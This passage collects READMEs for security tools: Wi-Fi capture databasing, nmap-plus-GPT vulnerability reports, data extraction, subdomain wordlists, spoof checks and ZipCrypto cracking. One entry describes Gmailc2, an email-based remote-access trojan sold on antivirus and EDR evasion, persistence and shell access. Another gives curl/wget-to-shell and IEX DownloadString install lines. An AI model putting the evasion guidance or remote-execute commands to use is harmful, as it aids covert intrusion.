    • Displays identity information from enterprise networks, including the EAP method used for authentication.
    • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
    • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
    • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
    • Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
    • Docker version in Docker Hub to avoid dependencies.
    • Obfuscated mode for demonstrations and conferences.
    • Possibility to add static GPS data.

    Install

    From DockerHub (RECOMMENDED)

    docker pull r4ulcl/wifi_db

    Manual installation

    Debian based systems (Ubuntu, Kali, Parrot, etc.)

    Dependencies:

    • python3
    • python3-pip
    • tshark
    • hcxtools
    sudo apt install tshark
    sudo apt install python3 python3-pip

    git clone https://github.com/ZerBea/hcxtools.git
    cd hcxtools
    make
    sudo make install
    cd ..

    Installation

    git clone https://github.com/r4ulcl/wifi_db
    cd wifi_db
    pip3 install -r requirements.txt

    Arch

    Dependencies:

    • python3
    • python3-pip
    • tshark
    • hcxtools
    sudo pacman -S wireshark-qt
    sudo pacman -S python-pip python

    git clone https://github.com/ZerBea/hcxtools.git
    cd hcxtools
    make
    sudo make install
    cd ..

    Installation

    git clone https://github.com/r4ulcl/wifi_db
    cd wifi_db
    pip3 install -r requirements.txt

    Usage

    Scan with airodump-ng

    Run airodump-ng saving the output with -w:

    sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

    Create the SQLite database using Docker

    #Folder with captures
    CAPTURESFOLDER=/home/user/wifi

    # Output database
    touch db.SQLITE

    docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
    • -v $PWD/db.SQLITE:/db.SQLITE: To save de output in current folder db.SQLITE file
    • -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the docker

    Create the SQLite database using manual installation

    Once the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.

    python3 wifi_db.py scan-01

    In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

    python3 wifi_db.py -d database.sqlite scan-folder

    Open database

    The database can be open with:

    Below is an example of a ProbeClientsConnected table.

    Arguments

    usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

    positional arguments:
    capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
    be added. This option supports the use of wildcards (*) to select multiple files or folders.

    options:
    -h, --help show this help message and exit
    -v, --verbose increase output verbosity
    --debug increase output verbosity to debug
    -o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
    -t LAT, --lat LAT insert a fake lat in the new elements
    -n LON, --lon LON insert a fake lon i n the new elements
    --source [{aircrack-ng,kismet,wigle}]
    source from capture data (default: aircrack-ng)
    -d DATABASE, --database DATABASE
    output database, if exist append to the given database (default name: db.SQLITE)

    Kismet

    TODO

    Wigle

    TODO

    Database

    wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

    • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

    • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

    • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

    • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

    • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

    • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

    • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

    • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

    • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

    Views

    • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

    • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

    • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

    • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

    • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.

    TODO

    • Aircrack-ng

    • All in 1 file (and separately)

    • Kismet

    • Wigle

    • install

    • parse all files in folder -f --folder

    • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

    • Support bash multi files: "capture*-1*"

    • Script to delete client or AP from DB (mac). - (Whitelist)

    • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

    • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

    • Table Handhsakes and PMKID

    • Hashcat hash format 22000

    • Table files, if file exists skip (full path)

    • Get HTTP POST passwords

    • DNS querys


    This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

    Author

    • RaΓΊl Calvo Laorden (@r4ulcl)

    License

    GNU General Public License v3.0



    GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    This is a Proof Of Concept application that demostrates how AI can be used to generate accurate results for vulnerability analysis and also allows further utilization of the already super useful ChatGPT.

    Requirements

    • Python 3.10
    • All the packages mentioned in the requirements.txt file
    • OpenAi api

    Usage

    • First Change the "API__KEY" part of the code with OpenAI api key
    openai.api_key = "__API__KEY" # Enter your API key
    • second install the packages
    pip3 install -r requirements.txt
    or
    pip install -r requirements.txt
    • run the code python3 gpt_vuln.py <> or if windows run python gpt_vuln.py <>

    Supported in both windows and linux

    Understanding the code

    Profiles:

    Parameter Return data Description Nmap Command
    p1 json Effective Scan -Pn -sV -T4 -O -F
    p2 json Simple Scan -Pn -T4 -A -v
    p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
    p4 json Partial Intense Scan -Pn -p- -T4 -A -v
    p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

    The profile is the type of scan that will be executed by the nmap subprocess. The Ip or target will be provided via argparse. At first the custom nmap scan is run which has all the curcial arguments for the scan to continue. nextly the scan data is extracted from the huge pile of data which has been driven by nmap. the "scan" object has a list of sub data under "tcp" each labled according to the ports opened. once the data is extracted the data is sent to openai API davenci model via a prompt. the prompt specifically asks for an JSON output and the data also to be used in a certain manner.

    The entire structure of request that has to be sent to the openai API is designed in the completion section of the Program.

    vulnerability analysis of {} and return a vulnerabilty report in json".format(analize) # A structure for the request completion = openai.Completion.create( engine=model_engine, prompt=prompt, max_tokens=1024, n=1, stop=None, ) response = completion.choices[0].text return response" dir="auto">
    def profile(ip):
    nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
    json_data = nm.analyse_nmap_xml_scan()
    analize = json_data["scan"]
    # Prompt about what the quary is all about
    prompt = "do a vulnerability analysis of {} and return a vulnerabilty report in json".format(analize)
    # A structure for the request
    completion = openai.Completion.create(
    engine=model_engine,
    prompt=prompt,
    max_tokens=1024,
    n=1,
    stop=None,
    )
    response = completion.choices[0].text
    return response

    Advantages

    • Can be used in developing a more advanced systems completly made of the API and scanner combination
    • Can increase the effectiveness of the final system
    • Highly productive when working with models such as GPT3


    DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


    Β DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

    • Supports Windows, Linux and MacOS

    Extraction Features

    • Emails
    • Files
    • Phone numbers
    • Credit Cards
    • Google API Private Key ID's
    • Social Security Numbers
    • AWS Keys
    • Bitcoin wallets
    • URL's
    • IPv4 Addresses and IPv6 addresses
    • MAC Addresses
    • SRV DNS Records
    • Extract Hashes
      • MD4 & MD5
      • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
      • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
      • MySQL 323, MySQL 41
      • NTLM
      • bcrypt

    Want more?

    Please read the contributing guidelines here

    Quick Install

    Install Rust and Github

    Linux

    wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

    Windows

    Enter the line below in an elevated powershell window.

    IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

    Relaunch your terminal and you will be able to use ds from the command line.

    Mac

    curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

    Command Line Arguments



    Video Guide

    Examples

    Extracting Files From a Remote Webiste

    Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

     wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


    Extracting Mac Addresses From an Output File

    Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

    $ ./ds -m -T --hide -f /var/log/autodeauth/log     
    2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
    2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

    Reading all files in a directory

    The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

    $ find . -type f -exec ds -f {} -CDe \;


    Speed Tests

    When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

    Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

    Computer Specs

    Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
    Ram 12.0 GB (11.9 GB usable)

    Searching all data types

    Command Speed
    cat test.txt | ds -t 00h:02m:04s
    ds -t -f test.txt 00h:02m:05s
    cat test.txt | ds -t -o output.txt 00h:02m:06s

    Using specific queries

    Command Speed Query Count
    cat test.txt | ds -t -6 00h:00m:12s 1
    cat test.txt | ds -t -i -m 00h:00m:22 2
    cat test.txt | ds -tF6c 00h:00m:32s 3

    Project Goals

    • JSON and CSV output
    • Untar/unzip and a directorty searching mode
    • Base64 Detection and decoding


    Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


     A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
    and Network Traffic Restrictions


    Note:

     This RAT communicates Via Gmail SMTP (or u can use any other smtps as well) but Gmail SMTP is valid
    because most of the companies block unknown traffic so gmail traffic is valid and allowed everywhere.

    Warning:

     1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
    with Time.
    2. Virustotal Share Signatures With AV Comapnies.
    3. Again Don't be an Idiot!

    How To Setup

     1. Create Two seperate Gmail Accounts.
    2. Now enable SMTP On Both Accounts (check youtube if u don't know)
    3. Suppose you have already created Two Seperate Gmail Accounts With SMTP enabled
    A -> first account represents Your_1st_gmail@gmail.com
    B -> 2nd account represents your_2nd_gmail@gmail.com
    4. Now Go To server.py file and fill the following at line 67:
    smtpserver="smtp.gmail.com" (don't change this)
    smtpuser="Your_1st_gmail@gmail.com"
    smtpkey="your_1st_gmail_app_password"
    imapserver="imap.gmail.com" (don't change this)
    imapboy="your_2nd_gmail@gmail.com"
    5. Now Go To client.py file and fill the following at line 16:
    imapserver = "imap.gmail.com" (dont change this)
    username = "your_2nd_gmail@gmail.com"
    password = "your2ndgmailapp password"
    getting = "Your_1st_gmail@gmail.com"
    smtpserver = "smtp.gmail.com" (don 't change this)
    6. Enjoy

    How To Run:-

     *:- For Windows:-
    1. Make Sure python3 and pip is installed and requriements also installed
    2. python server.py (on server side)


    *:- For Linux:-
    1. Make Sure All Requriements is installed.
    2. python3 server.py (on server side)

    C2 Feature:-

     1) Persistence (type persist)
    2) Shell Access
    3) System Info (type info)
    4) More Features Will Be Added

    Features:-

    1) FUD Ratio 0/40
    2) Bypass Any EDR's Solutions
    3) Bypass Any Network Restrictions
    4) Commands Are Being Sent in Base64 And Decoded on server side
    5) No More Tcp Shits

    Warning:-

    Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.


    Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


    Online tool: https://weakpass.com/generate/domains

    TL;DR

    During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions:

    1. What are the most popular subdomains?
    2. What are the most common words in multilevel subdomains on different levels?
    3. What are the most used words in subdomains?

    And, of course, wordlists for all of the questions above!


    Methodology

    As sources, I used lists of subdomains from public bugbounty programs, that were collected by chaos.projectdiscovery.io, bounty-targets-data or that just had responsible disclosure programs with a total number of 4095 domains! If subdomains appear more than in 5-10 different scopes, they will be put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less< /strong>.

    You can find complete list of sources here

    Lists

    Subdomains

    In these lists you will find most popular subdomains as is.

    Name Words count Size
    subdomains.txt.gz 21901389 501MB
    subdomains_top100.txt 100 706B
    subdomains_top1000.txt 1000 7.2KB
    subdomains_top10000.txt 10000 70KB

    Subdomain levels

    In these lists, you will find the most popular words from subdomains split by levels. F.E - dev.stg subdomain will be split into two words dev and stg. dev will have level = 2, stg - level = 1. You can use these wordlists for combinatory attacks for subdomain searches. There are several types of level.txt wordlists that follow the idea of subdomains.

    Name Words count Size
    level_1.txt.gz 8096054 153MB
    level_2.txt.gz 7556074 106MB
    level_3.txt.gz 1490999 18MB
    level_4.txt.gz 205969 3.2MB
    level_5.txt.gz 71716 849KB
    level_1_top100.txt 100 633B
    level_1_top1000.txt 1000 6.6K
    level_2_top100.txt 100 550B
    level_2_top1000.txt 1000 5.6KB
    level_3_top100.txt 100 531B
    level_3_top1000.txt 1000 5.1KB
    level_4_top100.txt 100 525B
    level_4_top1000.txt 1000 5.0KB
    level_5_top100.txt 100 449B
    level_5_top1000.txt 1000 5.0KB

    Popular splitted subdomains

    In these lists, you will find the most popular splitted words from subdomains on all levels. For example - dev.stg subdomain will be splitted in two words dev and stg.

    Name Words count Size
    words.txt.gz 17229401 278MB
    words_top100.txt 100 597B
    words_top1000.txt 1000 5.5KB
    words_top10000.txt 10000 62KB

    Google Drive

    You can download all the files from Google Drive

    Attributions

    Thanks!



    Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains


    Verify whether the domain is vulnerable to spoofing by Email-vulnerablity-checker

    Features

    • This tool will automatically tells you if the domain is email spoofable or not
    • you can do single and multiple domain input as well (for multiple domain checker you need to have text file with domains in it)

    Usage:

    Clone the package by running:

    git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

    Step 1. Install Requirements

    Linux distribution sudo apt update sudo apt install dnsutils # Install dig for CentOS sudo yum install bind-utils # Install dig for macOS brew install dig" dir="auto">
    # Update the package list and install dig for Debian-based Linux distribution 
    sudo apt update
    sudo apt install dnsutils

    # Install dig for CentOS
    sudo yum install bind-utils

    # Install dig for macOS
    brew install dig

    Step 2. Finish The Instalation

    To use the Email-Vulnerablity-Checker type the following commands in Terminal:

    apt install git -y 
    apt install dig -y
    git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
    cd Email-Vulnerablity-Checker
    chmod 777 spfvuln.sh

    Run email vulnerablity checker by just typing:

    ./spfvuln.sh -h

    Support

    For Queries: Telegram
    Contributions, issues, and feature requests are welcome!
    Give a β˜… if you like this project!



    GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


    Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

    Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseβ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


    Conceptually, GUAC occupies the β€œaggregation and synthesis” layer of the software supply chain transparency logical model:

    A few examples of questions answered by GUAC include:

    Quickstart

    Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

    Architecture

    Here is an overview of the architecture of GUAC:

    Supported input formats

    Additional References

    Communication

    We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.

    For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

    Governance

    Information about governance can be found here.



    Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


    Tai-e

    What is Tai-e?

    Tai-e (Chinese: ε€ͺ阿; pronunciation: [ˈtaΙͺΙ™:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

    Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

    • Powerful pointer analysis framework
      • On-the-fly call graph construction
      • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
      • Extensible analysis plugin system (allows to conveniently develop and add new analyses that interact with pointer analysis)
    • Various fundamental/client/utility analyses
      • Fundamental analyses, e.g., reflection analysis and exception analysis
      • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
      • Clients, e.g., configurable taint analysis (allowing to configure sources, sinks and taint transfers)
      • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
    • Control/Data-flow analysis framework
      • Control-flow graph construction
      • Classic data-flow analyses, e.g., live variable analysis, constant propagation
      • Your data-flow analyses
    • SpotBugs-like bug detection system
      • Bug detectors, e.g., null pointer detector, incorrect clone() detector
      • Your bug detectors

    Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


    How to Obtain Runnable Jar of Tai-e?

    The simplest way is to download it from GitHub Releases.

    Alternatively, you might build the latest Tai-e yourself from the source code. This can be simply done via Gradle (be sure that Java 17 (or higher version) is available on your system). You just need to run command gradlew fatJar, and then the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

    Documentation

    We are hosting the documentation of Tai-e on the GitHub wiki, where you could find more information about Tai-e such as Setup in IntelliJ IDEA , Command-Line Options , and Development of New Analysis .

    Tai-e Assignments

    In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



    Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


    Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

    Overview

    A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based Encryption Algorithm symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bits integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of nl-6 where n is the size of the character set and l is the length of the password.

    bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

    • Recover internal state from ciphertext and plaintext.
    • Change a ZIP archive's password using the internal state.
    • Recover the original password from the internal state.

    Install

    Precompiled packages

    You can get the latest official release on GitHub.

    Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

    On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

    Compile from source

    Alternatively, you can compile the project with CMake.

    First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

    cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
    cmake --build build --config Release
    cmake --build build --config Release --target install

    Thrid-party packages

    bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

    Usage

    List entries

    You can see a list of entry names and metadata in an archive named archive.zip like this:

    bkcrack -L archive.zip

    Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

    Recover internal keys

    The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

    Load data from zip archives

    Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

    bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

    Load data from files

    Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

    bkcrack -c cipherfile -p plainfile

    Offset

    If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

    bkcrack -c cipherfile -p plainfile -o offset

    Sparse plaintext

    If you know little contiguous plaintext (between 8 and 11 bytes), but know some bytes at some other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

    bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

    Number of threads

    If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

    Decipher

    If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

    bkcrack -c cipherfile -p plainfile -d decipheredfile

    If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

    bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

    Decompress

    The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

    python3 tools/inflate.py < decipheredfile > decompressedfile

    Unlock encrypted archive

    It is also possible to generate a new encrypted archive with the password of your choice:

    bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

    The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

    Recover password

    Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

    bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

    You can be more specific by specifying a minimal password length:

    bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

    Learn

    A tutorial is provided in the example folder.

    For more information, have a look at the documentation and read the source.

    Contribute

    Do not hesitate to suggest improvements or submit pull requests on GitHub.

    License

    This project is provided under the terms of the zlib/png license.



    ❌